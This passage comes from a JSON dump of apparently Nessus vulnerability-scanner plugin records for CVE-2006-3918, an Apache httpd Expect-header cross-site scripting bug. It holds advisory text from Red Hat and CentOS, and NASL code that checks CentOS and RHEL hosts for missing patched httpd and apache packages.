Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in the handling of malformed Expect headers, the page produced by the cross-site scripting attack will only be returned after a timeout expires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain a backported patch to correct these issues.", "edition": 5, "reporter": "Tenable", "published": "2006-08-14T00:00:00", "title": "CentOS 3 / 4 : httpd (CESA-2006:0619)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd-suexec", "p-cpe:/a:centos:centos:mod_ssl", "p-cpe:/a:centos:centos:httpd-manual", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2006-0619.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0619 and \n# CentOS Errata and Security Advisory 2006:0619 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22207);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_xref(name:\"RHSA\", value:\"2006:0619\");\n\n script_name(english:\"CentOS 3 / 4 : httpd (CESA-2006:0619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Apache httpd packages that correct security issues and resolve\nbugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue\nin the handling of malformed Expect headers, the page produced by the\ncross-site scripting attack will only be returned after a timeout\nexpires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain\na backported patch to correct these issues.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-August/013135.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?193d64f0\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-August/013136.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29a2345f\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-August/013143.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?713ca316\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-August/013144.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e0e9457\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"httpd-2.0.46-61.ent.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"httpd-2.0.46-61.ent.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"httpd-devel-2.0.46-61.ent.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.46-61.ent.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"mod_ssl-2.0.46-61.ent.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.46-61.ent.centos3\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-28.ent.centos4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:36:36", "references": ["http://www.nessus.org/u?fd734734"], "pluginID": "67036", "description": "Updated Apache httpd packages that correct a security issue are now available for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nUsers of Apache should upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 5, "reporter": "Tenable", "published": "2013-06-29T00:00:00", "title": "CentOS 4 : apache (CESA-2006:0618)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd-suexec", "p-cpe:/a:centos:centos:mod_ssl", "p-cpe:/a:centos:centos:httpd-manual", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel"], "id": "CENTOS_RHSA-2006-0618.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0618 and \n# CentOS Errata and Security Advisory 2006:0618 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67036);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/06/27 18:42:24\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_xref(name:\"RHSA\", value:\"2006:0618\");\n\n script_name(english:\"CentOS 4 : apache (CESA-2006:0618)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Apache httpd packages that correct a security issue are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nUsers of Apache should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2006-August/013165.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fd734734\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"httpd-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"httpd-devel-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"httpd-manual-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"httpd-suexec-2.0.52-28.ent.centos4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"mod_ssl-2.0.52-28.ent.centos4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:33:13", "references": ["https://www.redhat.com/security/data/cve/CVE-2006-3918.html", "http://rhn.redhat.com/errata/RHSA-2006-0618.html"], "pluginID": "22202", "description": "Updated Apache httpd packages that correct a security issue are now available for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nUsers of Apache should upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 6, "reporter": "Tenable", "published": "2006-08-10T00:00:00", "title": "RHEL 2.1 : apache (RHSA-2006:0618)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918"], "modified": "2018-07-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:apache", "p-cpe:/a:redhat:enterprise_linux:apache-manual", "p-cpe:/a:redhat:enterprise_linux:apache-devel"], "id": "REDHAT-RHSA-2006-0618.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22202", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0618. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22202);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/07/25 18:58:04\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_xref(name:\"RHSA\", value:\"2006:0618\");\n\n script_name(english:\"RHEL 2.1 : apache (RHSA-2006:0618)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Apache httpd packages that correct a security issue are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nUsers of Apache should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-3918.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2006-0618.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected apache, apache-devel and / or apache-manual\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0618\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-1.3.27-11.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-devel-1.3.27-11.ent\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-manual-1.3.27-11.ent\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / apache-devel / apache-manual\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:34:06", "references": ["https://www.redhat.com/security/data/cve/CVE-2006-3918.html", "http://rhn.redhat.com/errata/RHSA-2006-0619.html"], "pluginID": "22224", "description": "Updated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in the handling of malformed Expect headers, the page produced by the cross-site scripting attack will only be returned after a timeout expires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain a backported patch to correct these issues.", "edition": 6, "reporter": "Tenable", "published": "2006-08-14T00:00:00", "title": "RHEL 3 / 4 : httpd (RHSA-2006:0619)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918"], "modified": "2018-07-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:httpd-suexec", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2006-0619.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22224", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0619. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22224);\n script_version (\"1.19\");\n script_cvs_date(\"Date: 2018/07/25 18:58:04\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_xref(name:\"RHSA\", value:\"2006:0619\");\n\n script_name(english:\"RHEL 3 / 4 : httpd (RHSA-2006:0619)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Apache httpd packages that correct security issues and resolve\nbugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue\nin the handling of malformed Expect headers, the page produced by the\ncross-site scripting attack will only be returned after a timeout\nexpires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain\na backported patch to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-3918.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2006-0619.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) 